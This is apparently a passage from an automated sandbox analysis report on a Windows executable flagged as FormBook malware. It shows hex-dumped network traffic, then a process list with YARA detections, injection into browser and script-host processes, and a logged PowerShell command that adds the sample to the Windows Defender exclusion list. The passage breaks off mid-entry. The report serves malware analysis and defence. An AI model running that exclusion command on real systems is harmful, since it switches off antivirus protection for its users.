                                                                                                                                                                            2024-12-11 08:40:01 UTC1371INData Raw: 65 6d 65 74 72 79 22 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 73 2e 50 65 72 66 6f 72 6d 61 6e 63 65 54 65 6c 65 6d 65 74 72 79 7d 7d 29 3b 74 2e 69 6e 69 74 54 65 6c 65 6d 65 74 72 79 3d 28 65 2c 74 29 3d 3e 7b 69 66 28 61 2e 54 65 6c 65 6d 65 74 72 79 53 68 61 72 65 64 44 61 74 61 2e 69 6e 69 74 65 64 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 54 65 6c 65 6d 65 74 72 79 20 69 73 20 61 6c 72 65 61 64 79 20 69 6e 69 74 65 64 2e 22 29 3b 61 2e 54 65 6c 65 6d 65 74 72 79 53 68 61 72 65 64 44 61 74 61 2e 73 65 74 53 61 6d 70 6c 65 52 61 74 65 28 65 29 2c 61 2e 54 65 6c 65 6d 65 74 72 79 53 68 61 72 65 64 44 61 74 61 2e 69 6e 69 74 65 64 3d 21 30 2c 28 30 2c 69 2e 69 6e 69 74 4c 69 73 74
                                                                                                                                                                            Data Ascii: emetry",{enumerable:!0,get:function(){return s.PerformanceTelemetry}});t.initTelemetry=(e,t)=>{if(a.TelemetrySharedData.inited)throw Error("Telemetry is already inited.");a.TelemetrySharedData.setSampleRate(e),a.TelemetrySharedData.inited=!0,(0,i.initList
                                                                                                                                                                            2024-12-11 08:40:01 UTC1371INData Raw: 65 29 7b 72 65 74 75 72 6e 28 6e 75 6c 6c 3d 3d 3d 28 74 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 61 6e 63 65 73 74 6f 72 4f 72 69 67 69 6e 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 6c 65 6e 67 74 68 29 3e 30 3f 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 61 6e 63 65 73 74 6f 72 4f 72 69 67 69 6e 73 5b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 61 6e 63 65 73 74 6f 72 4f 72 69 67 69 6e 73 2e 6c 65 6e 67 74 68 2d 31 5d 3a 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 7d 7d 2c 74 2e 73 63 72 65 65 6e 49 6e 66 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 64 65 76 69 63 65 50 69 78 65 6c 52 61 74 69 6f 3a 28 6e 75 6c 6c 3d 3d 3d 77 69 6e 64 6f 77 7c 7c 76 6f 69 64 20 30 3d 3d 3d 77
                                                                                                                                                                            Data Ascii: e){return(null===(t=window.location.ancestorOrigins)||void 0===t?void 0:t.length)>0?window.location.ancestorOrigins[window.location.ancestorOrigins.length-1]:window.location.href}},t.screenInfo=function(){return{devicePixelRatio:(null===window||void 0===w
                                                                                                                                                                            2024-12-11 08:40:01 UTC1371INData Raw: 74 68 26 26 67 28 29 29 7d 66 75 6e 63 74 69 6f 6e 20 67 28 29 7b 69 66 28 21 6c 29 7b 76 61 72 20 65 3d 73 28 70 29 3b 6c 3d 21 30 3b 66 6f 72 28 76 61 72 20 74 3d 63 2e 6c 65 6e 67 74 68 3b 74 3b 29 7b 66 6f 72 28 64 3d 63 2c 63 3d 5b 5d 3b 2b 2b 75 3c 74 3b 29 64 26 26 64 5b 75 5d 2e 72 75 6e 28 29 3b 75 3d 2d 31 2c 74 3d 63 2e 6c 65 6e 67 74 68 7d 64 3d 6e 75 6c 6c 2c 6c 3d 21 31 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 61 3d 3d 3d 63 6c 65 61 72 54 69 6d 65 6f 75 74 29 72 65 74 75 72 6e 20 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 65 29 3b 69 66 28 28 61 3d 3d 3d 6f 7c 7c 21 61 29 26 26 63 6c 65 61 72 54 69 6d 65 6f 75 74 29 72 65 74 75 72 6e 20 61 3d 63 6c 65 61 72 54 69 6d 65 6f 75 74 2c 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 65 29 3b 74 72 79
                                                                                                                                                                            Data Ascii: th&&g())}function g(){if(!l){var e=s(p);l=!0;for(var t=c.length;t;){for(d=c,c=[];++u<t;)d&&d[u].run();u=-1,t=c.length}d=null,l=!1,function(e){if(a===clearTimeout)return clearTimeout(e);if((a===o||!a)&&clearTimeout)return a=clearTimeout,clearTimeout(e);try
                                                                                                                                                                            2024-12-11 08:40:01 UTC1371INData Raw: 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 69 6e 63 6c 75 64 65 73 28 22 2f 2f 6c 6f 63 61 6c 68 6f 73 74 22 29 29 29 7c 7c 61 2e 54 65 6c 65 6d 65 74 72 79 53 68 61 72 65 64 44 61 74 61 2e 73 6b 69 70 4c 6f 67 67 69 6e 67 7d 6c 6f 67 28 74 2c 7b 69 64 3a 6e 7d 3d 7b 7d 29 7b 63 6f 6e 73 74 20 73 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 7d 2c 61 2e 54 65 6c 65 6d 65 74 72 79 53 68 61 72 65 64 44 61 74 61 2e 67 65 74 53 65 73 73 69 6f 6e 44 61 74 61 28 29 29 2c 61 2e 54 65 6c 65 6d 65 74 72 79 53 68 61 72 65 64 44 61 74 61 2e 67 65 74 50 6c 61 63 65 6d 65 6e 74 44 61 74 61 28 6e 29 29 2c 74 29 2c 7b 74 69
                                                                                                                                                                            Data Ascii: |void 0===t?void 0:t.includes("//localhost")))||a.TelemetrySharedData.skipLogging}log(t,{id:n}={}){const s=Object.assign(Object.assign(Object.assign(Object.assign({},a.TelemetrySharedData.getSessionData()),a.TelemetrySharedData.getPlacementData(n)),t),{ti
                                                                                                                                                                            2024-12-11 08:40:01 UTC1371INData Raw: 2e 64 65 76 69 63 65 50 69 78 65 6c 52 61 74 69 6f 2c 6e 65 74 77 6f 72 6b 54 79 70 65 3a 6f 2c 6c 61 6e 67 3a 6e 61 76 69 67 61 74 6f 72 2e 6c 61 6e 67 75 61 67 65 7d 7d 73 65 74 53 61 6d 70 6c 65 52 61 74 65 28 74 29 7b 74 68 69 73 2e 73 61 6d 70 6c 65 52 61 74 65 3d 65 2e 65 6e 76 2e 49 53 5f 44 45 56 7c 7c 65 2e 65 6e 76 2e 49 53 5f 54 45 53 54 53 7c 7c 28 30 2c 72 2e 61 6c 6c 6f 77 54 65 6c 65 6d 65 74 72 79 29 28 29 3f 31 3a 74 2c 74 68 69 73 2e 73 6b 69 70 4c 6f 67 67 69 6e 67 3d 74 68 69 73 2e 73 6b 69 70 4c 6f 67 67 69 6e 67 42 79 53 61 6d 70 6c 65 52 61 74 65 28 29 7d 73 6b 69 70 4c 6f 67 67 69 6e 67 42 79 53 61 6d 70 6c 65 52 61 74 65 28 29 7b 72 65 74 75 72 6e 20 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3e 74 68 69 73 2e 73 61 6d 70 6c 65 52 61
                                                                                                                                                                            Data Ascii: .devicePixelRatio,networkType:o,lang:navigator.language}}setSampleRate(t){this.sampleRate=e.env.IS_DEV||e.env.IS_TESTS||(0,r.allowTelemetry)()?1:t,this.skipLogging=this.skipLoggingBySampleRate()}skipLoggingBySampleRate(){return Math.random()>this.sampleRa
                                                                                                                                                                            2024-12-11 08:40:01 UTC1371INData Raw: 61 2b 2b 5d 5d 2c 22 2d 22 2c 72 5b 65 5b 61 2b 2b 5d 5d 2c 72 5b 65 5b 61 2b 2b 5d 5d 2c 72 5b 65 5b 61 2b 2b 5d 5d 2c 72 5b 65 5b 61 2b 2b 5d 5d 2c 72 5b 65 5b 61 2b 2b 5d 5d 2c 72 5b 65 5b 61 2b 2b 5d 5d 5d 2e 6a 6f 69 6e 28 22 22 29 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 63 6f 6e 66 69 67 3d 76 6f 69 64 20 30 3b 63 6f 6e 73 74 20 61 3d 6e 28 31 34 29 2c 72 3d 6e 28 31 35 29 3b 6c 65 74 20 69 3d 61 2e 63 6f 6e 66 69 67 50 72 6f 64 3b 74 2e 63 6f 6e 66 69 67 3d 69 2c 65 2e 65 6e 76 2e 49 53 5f 44 45 56 26 26
                                                                                                                                                                            Data Ascii: a++]],"-",r[e[a++]],r[e[a++]],r[e[a++]],r[e[a++]],r[e[a++]],r[e[a++]]].join("")}},function(e,t,n){"use strict";(function(e){Object.defineProperty(t,"__esModule",{value:!0}),t.config=void 0;const a=n(14),r=n(15);let i=a.configProd;t.config=i,e.env.IS_DEV&&


                                                                                                                                                                            Click to jump to process

                                                                                                                                                                            Click to jump to process

                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                            Click to jump to process

                                                                                                                                                                            Target ID:0
                                                                                                                                                                            Start time:03:38:55
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Users\user\Desktop\Nieuwebestellingen10122024.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\Nieuwebestellingen10122024.exe"
                                                                                                                                                                            Imagebase:0x1df34220000
                                                                                                                                                                            File size:644'232 bytes
                                                                                                                                                                            MD5 hash:9A344F7AA0C680768ABA67A0738DEE2A
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2163050689.000001DF364BE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            Reputation:low
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:1
                                                                                                                                                                            Start time:03:38:55
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:3
                                                                                                                                                                            Start time:03:38:59
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nieuwebestellingen10122024.exe" -Force
                                                                                                                                                                            Imagebase:0x7ff7be880000
                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:4
                                                                                                                                                                            Start time:03:38:59
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:5
                                                                                                                                                                            Start time:03:38:59
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Internet Explorer\iexplore.exe"
                                                                                                                                                                            Imagebase:0xe20000
                                                                                                                                                                            File size:828'368 bytes
                                                                                                                                                                            MD5 hash:6F0F06D6AB125A99E43335427066A4A1
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2332811973.00000000031F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2328130427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2334142398.0000000003760000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:6
                                                                                                                                                                            Start time:03:38:59
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            Wow64 process (32bit):
                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Internet Explorer\iexplore.exe"
                                                                                                                                                                            Imagebase:
                                                                                                                                                                            File size:828'368 bytes
                                                                                                                                                                            MD5 hash:6F0F06D6AB125A99E43335427066A4A1
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            Target ID:8
                                                                                                                                                                            Start time:03:39:00
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:C:\Windows\system32\WerFault.exe -u -p 6096 -s 1612
                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                            File size:570'736 bytes
                                                                                                                                                                            MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:9
                                                                                                                                                                            Start time:03:39:06
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                            Imagebase:0x7ff6ef0c0000
                                                                                                                                                                            File size:496'640 bytes
                                                                                                                                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:11
                                                                                                                                                                            Start time:03:39:17
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe"
                                                                                                                                                                            Imagebase:0xcd0000
                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.4500032925.0000000002E00000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            Target ID:12
                                                                                                                                                                            Start time:03:39:18
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Windows\SysWOW64\wscript.exe"
                                                                                                                                                                            Imagebase:0xa90000
                                                                                                                                                                            File size:147'456 bytes
                                                                                                                                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.4498799209.00000000007D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.4499774124.0000000000A20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            Target ID:13
                                                                                                                                                                            Start time:03:39:32
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe"
                                                                                                                                                                            Imagebase:0xcd0000
                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.4502014395.0000000004BB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            Target ID:14
                                                                                                                                                                            Start time:03:39:36
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Internet Explorer\iexplore.exe"
                                                                                                                                                                            Imagebase:0xe20000
                                                                                                                                                                            File size:828'368 bytes
                                                                                                                                                                            MD5 hash:6F0F06D6AB125A99E43335427066A4A1
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:15
                                                                                                                                                                            Start time:03:39:36
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:"C:\Program Files\Internet Explorer\IEXPLORE.EXE"
                                                                                                                                                                            Imagebase:0x7ff7643e0000
                                                                                                                                                                            File size:834'512 bytes
                                                                                                                                                                            MD5 hash:CFE2E6942AC1B72981B3105E22D3224E
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            Target ID:16
                                                                                                                                                                            Start time:03:39:36
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5032 CREDAT:17410 /prefetch:2
                                                                                                                                                                            Imagebase:0xe20000
                                                                                                                                                                            File size:828'368 bytes
                                                                                                                                                                            MD5 hash:6F0F06D6AB125A99E43335427066A4A1
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            Target ID:17
                                                                                                                                                                            Start time:03:39:37
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe" --from-ie-to-edge=3 --ie-frame-hwnd=1045c
                                                                                                                                                                            Imagebase:0x7ff7f23a0000
                                                                                                                                                                            File size:540'712 bytes
                                                                                                                                                                            MD5 hash:89CF8972D683795DAB6901BC9456675D
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:18
                                                                                                                                                                            Start time:03:39:37
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new
                                                                                                                                                                            Imagebase:0xdb0000
                                                                                                                                                                            File size:85'632 bytes
                                                                                                                                                                            MD5 hash:F9A898A606E7F5A1CD7CFFA8079253A0
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:19
                                                                                                                                                                            Start time:03:39:37
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --from-ie-to-edge=3 --ie-frame-hwnd=1045c
                                                                                                                                                                            Imagebase:0x7ff6c1cf0000
                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                            MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            Target ID:20
                                                                                                                                                                            Start time:03:39:38
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                            Imagebase:0x7ff7e52b0000
                                                                                                                                                                            File size:55'320 bytes
                                                                                                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            Target ID:21
                                                                                                                                                                            Start time:03:39:38
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2216 --field-trial-handle=2088,i,5847155238363767724,15255944632631986070,262144 /prefetch:3
                                                                                                                                                                            Imagebase:0x7ff6c1cf0000
                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                            MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            Target ID:24
                                                                                                                                                                            Start time:03:39:42
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5972 --field-trial-handle=2088,i,5847155238363767724,15255944632631986070,262144 /prefetch:8
                                                                                                                                                                            Imagebase:0x7ff6c1cf0000
                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                            MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:27
                                                                                                                                                                            Start time:03:39:45
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Internet Explorer\iexplore.exe"
                                                                                                                                                                            Imagebase:0xe20000
                                                                                                                                                                            File size:828'368 bytes
                                                                                                                                                                            MD5 hash:6F0F06D6AB125A99E43335427066A4A1
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:28
                                                                                                                                                                            Start time:03:39:45
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:"C:\Program Files\Internet Explorer\IEXPLORE.EXE"
                                                                                                                                                                            Imagebase:0x7ff7643e0000
                                                                                                                                                                            File size:834'512 bytes
                                                                                                                                                                            MD5 hash:CFE2E6942AC1B72981B3105E22D3224E
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:29
                                                                                                                                                                            Start time:03:39:46
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5032 CREDAT:17416 /prefetch:2
                                                                                                                                                                            Imagebase:0xe20000
                                                                                                                                                                            File size:828'368 bytes
                                                                                                                                                                            MD5 hash:6F0F06D6AB125A99E43335427066A4A1
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            Target ID:30
                                                                                                                                                                            Start time:03:39:48
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                                            Imagebase:0x7ff79f9e0000
                                                                                                                                                                            File size:676'768 bytes
                                                                                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:31
                                                                                                                                                                            Start time:03:42:38
